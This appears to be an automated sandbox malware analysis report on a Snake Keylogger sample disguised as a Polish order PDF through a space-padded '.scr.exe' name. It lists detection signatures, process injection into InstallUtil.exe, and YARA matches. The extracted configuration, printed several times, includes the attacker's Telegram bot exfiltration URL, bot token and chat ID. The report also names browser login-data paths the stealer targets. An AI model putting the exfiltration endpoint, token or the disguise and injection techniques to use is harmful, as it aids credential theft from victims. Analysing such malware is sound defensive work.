Edit tour

Windows Analysis Report
zam#U00f3wienie 12832025_pdf .scr.exe

Overview

General Information

Sample name:	zam#U00f3wienie 12832025_pdf .scr.exe renamed because original name is a hash value
Original sample name:	zamwienie 12832025_pdf .scr.exe
Analysis ID:	1658030
MD5:	83792964e40a22bcfc1e2f1306b0bf45
SHA1:	d63bd6e28a9121437b7058a7431e47f646a2eb24
SHA256:	80b9229be143dc6f0ced2e037e4b3354bd364c90bc39b47ef5e65d6bd196a91a
Tags:	exeuser-wwwwe
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Snake Keylogger

.NET source code contains potential unpacker

Downloads files with wrong headers with respect to MIME Content-Type

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Modifies the context of a thread in another process (thread injection)

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses an obfuscated file name to hide its real file extension (a lot of spaces)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

zam#U00f3wienie 12832025_pdf .scr.exe (PID: 2360 cmdline: "C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe" MD5: 83792964E40A22BCFC1E2F1306B0BF45)

InstallUtil.exe (PID: 5604 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" MD5: 909A1D386235DD5F6BA61B91BA34119D)

WerFault.exe (PID: 8048 cmdline: C:\Windows\system32\WerFault.exe -u -p 5604 -s 1424 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{
  "Exfil Mode": "Telegram",
  "Telegram URL": "https://api.telegram.org/bot8162223389:AAH2RDiU3vMZB9ziQM2XzQn3SGkNjgVLkm4/sendMessage?chat_id=1018401531",
  "Token": "8162223389:AAH2RDiU3vMZB9ziQM2XzQn3SGkNjgVLkm4",
  "Chat_id": "1018401531",
  "Version": "5.1"
}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1619061673.000002C6A3280000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d133:$a1: get_encryptedPassword 0x1d41f:$a2: get_encryptedUsername 0x1cf3f:$a3: get_timePasswordChanged 0x1d03a:$a4: get_passwordField 0x1d149:$a5: set_encryptedPassword 0x1e76e:$a7: get_logins 0x1e6d1:$a10: KeyLoggerEventArgs 0x1e36a:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x220a8:$x1: $%SMTPDV$ 0x20a8c:$x2: $#TheHashHere%& 0x22050:$x3: %FTPDV$ 0x20a2c:$x4: $%TelegramDv$ 0x1e36a:$x5: KeyLoggerEventArgs 0x1e6d1:$x5: KeyLoggerEventArgs 0x22074:$m2: Clipboard Logs ID 0x222b2:$m2: Screenshot Logs ID 0x223c2:$m2: keystroke Logs ID 0x2269c:$m3: SnakePW 0x2228a:$m4: \SnakeKeylogger\
00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14753:$a1: get_encryptedPassword 0x14a3f:$a2: get_encryptedUsername 0x1455f:$a3: get_timePasswordChanged 0x1465a:$a4: get_passwordField 0x14769:$a5: set_encryptedPassword 0x15d8e:$a7: get_logins 0x15cf1:$a10: KeyLoggerEventArgs 0x1598a:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x196c8:$x1: $%SMTPDV$ 0x180ac:$x2: $#TheHashHere%& 0x19670:$x3: %FTPDV$ 0x1804c:$x4: $%TelegramDv$ 0x1598a:$x5: KeyLoggerEventArgs 0x15cf1:$x5: KeyLoggerEventArgs 0x19694:$m2: Clipboard Logs ID 0x198d2:$m2: Screenshot Logs ID 0x199e2:$m2: keystroke Logs ID 0x19cbc:$m3: SnakePW 0x198aa:$m4: \SnakeKeylogger\
00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x149ab:$a1: get_encryptedPassword 0x14c97:$a2: get_encryptedUsername 0x147b7:$a3: get_timePasswordChanged 0x148b2:$a4: get_passwordField 0x149c1:$a5: set_encryptedPassword 0x15fe6:$a7: get_logins 0x15f49:$a10: KeyLoggerEventArgs 0x15be2:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19920:$x1: $%SMTPDV$ 0x18304:$x2: $#TheHashHere%& 0x198c8:$x3: %FTPDV$ 0x182a4:$x4: $%TelegramDv$ 0x15be2:$x5: KeyLoggerEventArgs 0x15f49:$x5: KeyLoggerEventArgs 0x198ec:$m2: Clipboard Logs ID 0x19b2a:$m2: Screenshot Logs ID 0x19c3a:$m2: keystroke Logs ID 0x19f14:$m3: SnakePW 0x19b02:$m4: \SnakeKeylogger\
00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x634ab:$a1: get_encryptedPassword 0x63797:$a2: get_encryptedUsername 0x632b7:$a3: get_timePasswordChanged 0x633b2:$a4: get_passwordField 0x634c1:$a5: set_encryptedPassword 0x64ae6:$a7: get_logins 0x64a49:$a10: KeyLoggerEventArgs 0x646e2:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x68420:$x1: $%SMTPDV$ 0x66e04:$x2: $#TheHashHere%& 0x683c8:$x3: %FTPDV$ 0x66da4:$x4: $%TelegramDv$ 0x646e2:$x5: KeyLoggerEventArgs 0x64a49:$x5: KeyLoggerEventArgs 0x683ec:$m2: Clipboard Logs ID 0x6862a:$m2: Screenshot Logs ID 0x6873a:$m2: keystroke Logs ID 0x68a14:$m3: SnakePW 0x68602:$m4: \SnakeKeylogger\
00000000.00000002.1607652560.000002C68A7C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.2548659789.000002642A231000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: zam#U00f3wienie 12832025_pdf .scr.exe PID: 2360	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: zam#U00f3wienie 12832025_pdf .scr.exe PID: 2360	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: zam#U00f3wienie 12832025_pdf .scr.exe PID: 2360	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: zam#U00f3wienie 12832025_pdf .scr.exe PID: 2360	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1bbf:$a1: get_encryptedPassword 0xa2ae4:$a1: get_encryptedPassword 0x11107d:$a1: get_encryptedPassword 0x1ea1:$a2: get_encryptedUsername 0xa2dc6:$a2: get_encryptedUsername 0x11124c:$a2: get_encryptedUsername 0x19d5:$a3: get_timePasswordChanged 0xa28fa:$a3: get_timePasswordChanged 0x110ea6:$a3: get_timePasswordChanged 0x1ad0:$a4: get_passwordField 0xa29f5:$a4: get_passwordField 0x110f95:$a4: get_passwordField 0x1bd5:$a5: set_encryptedPassword 0xa2afa:$a5: set_encryptedPassword 0x111093:$a5: set_encryptedPassword 0x3fef:$a7: get_logins 0xa4f14:$a7: get_logins 0x112dcd:$a7: get_logins 0x3f52:$a10: KeyLoggerEventArgs 0xa4e77:$a10: KeyLoggerEventArgs 0x112d3a:$a10: KeyLoggerEventArgs
Process Memory Space: zam#U00f3wienie 12832025_pdf .scr.exe PID: 2360	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x3beb:$x5: KeyLoggerEventArgs 0x3f52:$x5: KeyLoggerEventArgs 0x4840:$x5: KeyLoggerEventArgs 0x4b74:$x5: KeyLoggerEventArgs 0xa4b10:$x5: KeyLoggerEventArgs 0xa4e77:$x5: KeyLoggerEventArgs 0xa5765:$x5: KeyLoggerEventArgs 0xa5a99:$x5: KeyLoggerEventArgs 0x112a91:$x5: KeyLoggerEventArgs 0x112d3a:$x5: KeyLoggerEventArgs 0x1134b2:$x5: KeyLoggerEventArgs 0x1137e6:$x5: KeyLoggerEventArgs 0x6101:$m2: Clipboard Logs ID 0x6207:$m2: Screenshot Logs ID 0x625d:$m2: keystroke Logs ID 0xa7026:$m2: Clipboard Logs ID 0xa712c:$m2: Screenshot Logs ID 0xa7182:$m2: keystroke Logs ID 0x114cd3:$m2: Clipboard Logs ID 0x114dd9:$m2: Screenshot Logs ID 0x114e2f:$m2: keystroke Logs ID
Process Memory Space: InstallUtil.exe PID: 5604	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 5604	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: InstallUtil.exe PID: 5604	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1407b:$a1: get_encryptedPassword 0x1435d:$a2: get_encryptedUsername 0x13e91:$a3: get_timePasswordChanged 0x13f8c:$a4: get_passwordField 0x14091:$a5: set_encryptedPassword 0x164ab:$a7: get_logins 0x1640e:$a10: KeyLoggerEventArgs 0x160a7:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: InstallUtil.exe PID: 5604	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x160a7:$x5: KeyLoggerEventArgs 0x1640e:$x5: KeyLoggerEventArgs 0x16cfc:$x5: KeyLoggerEventArgs 0x17030:$x5: KeyLoggerEventArgs 0x185bd:$m2: Clipboard Logs ID 0x186c3:$m2: Screenshot Logs ID 0x18719:$m2: keystroke Logs ID 0x1884e:$m3: SnakePW 0x186af:$m4: \SnakeKeylogger\
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a3280000.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a3280000.6.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
2.2.InstallUtil.exe.140000000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.InstallUtil.exe.140000000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.InstallUtil.exe.140000000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14953:$a1: get_encryptedPassword 0x14c3f:$a2: get_encryptedUsername 0x1475f:$a3: get_timePasswordChanged 0x1485a:$a4: get_passwordField 0x14969:$a5: set_encryptedPassword 0x15f8e:$a7: get_logins 0x15ef1:$a10: KeyLoggerEventArgs 0x15b8a:$a11: KeyLoggerEventArgsEventHandler
2.2.InstallUtil.exe.140000000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c27e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b4b0:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b8e3:$a4: \Orbitum\User Data\Default\Login Data 0x1c922:$a5: \Kometa\User Data\Default\Login Data
2.2.InstallUtil.exe.140000000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1550e:$s1: UnHook 0x15515:$s2: SetHook 0x1551d:$s3: CallNextHook 0x1552a:$s4: _hook
2.2.InstallUtil.exe.140000000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x198c8:$x1: $%SMTPDV$ 0x182ac:$x2: $#TheHashHere%& 0x19870:$x3: %FTPDV$ 0x1824c:$x4: $%TelegramDv$ 0x15b8a:$x5: KeyLoggerEventArgs 0x15ef1:$x5: KeyLoggerEventArgs 0x19894:$m2: Clipboard Logs ID 0x19ad2:$m2: Screenshot Logs ID 0x19be2:$m2: keystroke Logs ID 0x19ebc:$m3: SnakePW 0x19aaa:$m4: \SnakeKeylogger\
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12b53:$a1: get_encryptedPassword 0x12e3f:$a2: get_encryptedUsername 0x1295f:$a3: get_timePasswordChanged 0x12a5a:$a4: get_passwordField 0x12b69:$a5: set_encryptedPassword 0x1418e:$a7: get_logins 0x140f1:$a10: KeyLoggerEventArgs 0x13d8a:$a11: KeyLoggerEventArgsEventHandler
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a47e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x196b0:$a3: \Google\Chrome\User Data\Default\Login Data 0x19ae3:$a4: \Orbitum\User Data\Default\Login Data 0x1ab22:$a5: \Kometa\User Data\Default\Login Data
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1370e:$s1: UnHook 0x13715:$s2: SetHook 0x1371d:$s3: CallNextHook 0x1372a:$s4: _hook
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17ac8:$x1: $%SMTPDV$ 0x164ac:$x2: $#TheHashHere%& 0x17a70:$x3: %FTPDV$ 0x1644c:$x4: $%TelegramDv$ 0x13d8a:$x5: KeyLoggerEventArgs 0x140f1:$x5: KeyLoggerEventArgs 0x17a94:$m2: Clipboard Logs ID 0x17cd2:$m2: Screenshot Logs ID 0x17de2:$m2: keystroke Logs ID 0x180bc:$m3: SnakePW 0x17caa:$m4: \SnakeKeylogger\
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14953:$a1: get_encryptedPassword 0x14c3f:$a2: get_encryptedUsername 0x1475f:$a3: get_timePasswordChanged 0x1485a:$a4: get_passwordField 0x14969:$a5: set_encryptedPassword 0x15f8e:$a7: get_logins 0x15ef1:$a10: KeyLoggerEventArgs 0x15b8a:$a11: KeyLoggerEventArgsEventHandler
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c27e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b4b0:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b8e3:$a4: \Orbitum\User Data\Default\Login Data 0x1c922:$a5: \Kometa\User Data\Default\Login Data
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1550e:$s1: UnHook 0x15515:$s2: SetHook 0x1551d:$s3: CallNextHook 0x1552a:$s4: _hook
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x198c8:$x1: $%SMTPDV$ 0x182ac:$x2: $#TheHashHere%& 0x19870:$x3: %FTPDV$ 0x1824c:$x4: $%TelegramDv$ 0x15b8a:$x5: KeyLoggerEventArgs 0x15ef1:$x5: KeyLoggerEventArgs 0x19894:$m2: Clipboard Logs ID 0x19ad2:$m2: Screenshot Logs ID 0x19be2:$m2: keystroke Logs ID 0x19ebc:$m3: SnakePW 0x19aaa:$m4: \SnakeKeylogger\
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x6318b:$a1: get_encryptedPassword 0x63477:$a2: get_encryptedUsername 0x62f97:$a3: get_timePasswordChanged 0x63092:$a4: get_passwordField 0x631a1:$a5: set_encryptedPassword 0x647c6:$a7: get_logins 0x64729:$a10: KeyLoggerEventArgs 0x643c2:$a11: KeyLoggerEventArgsEventHandler
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x6aab6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x69ce8:$a3: \Google\Chrome\User Data\Default\Login Data 0x6a11b:$a4: \Orbitum\User Data\Default\Login Data 0x6b15a:$a5: \Kometa\User Data\Default\Login Data
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x63d46:$s1: UnHook 0x63d4d:$s2: SetHook 0x63d55:$s3: CallNextHook 0x63d62:$s4: _hook
0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x68100:$x1: $%SMTPDV$ 0x66ae4:$x2: $#TheHashHere%& 0x680a8:$x3: %FTPDV$ 0x66a84:$x4: $%TelegramDv$ 0x643c2:$x5: KeyLoggerEventArgs 0x64729:$x5: KeyLoggerEventArgs 0x680cc:$m2: Clipboard Logs ID 0x6830a:$m2: Screenshot Logs ID 0x6841a:$m2: keystroke Logs ID 0x686f4:$m3: SnakePW 0x682e2:$m4: \SnakeKeylogger\
Click to see the 21 entries

Joe Sandbox Signatures

• AV Detection
• Compliance
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8162223389:AAH2RDiU3vMZB9ziQM2XzQn3SGkNjgVLkm4/sendMessage?chat_id=1018401531", "Token": "8162223389:AAH2RDiU3vMZB9ziQM2XzQn3SGkNjgVLkm4", "Chat_id": "1018401531", "Version": "5.1"}

Multi AV Scanner detection for submitted file

Source: zam#U00f3wienie 12832025_pdf .scr.exe

Virustotal: Detection: 19%

Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 99.9%

Sample uses string decryption to hide its real strings

Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack	String decryptor:
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack	String decryptor: 8162223389:AAH2RDiU3vMZB9ziQM2XzQn3SGkNjgVLkm4
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack	String decryptor: 1018401531

Source: zam#U00f3wienie 12832025_pdf .scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdbJ! source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tallUtil.pdb source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A711000.00000004.00000800.00020000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619439795.000002C6A33A0000.00000004.08000000.00040000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A711000.00000004.00000800.00020000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619439795.000002C6A33A0000.00000004.08000000.00040000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.pdb0 source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619250720.000002C6A3350000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: InstallUtil.pdbH source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdbx! source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619250720.000002C6A3350000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: !til.pdb source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb ( source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.PDBp source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdbwork64/v4.0.30319/InstallUtil.exe source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\InstallUtil.pdb` source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: til.pdb source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: 8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\InstallUtil.pdbH2; source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbt! source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: pC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000002.00000002.2547904821.00000264286EE000.00000004.00000020.00020000.00000000.sdmp
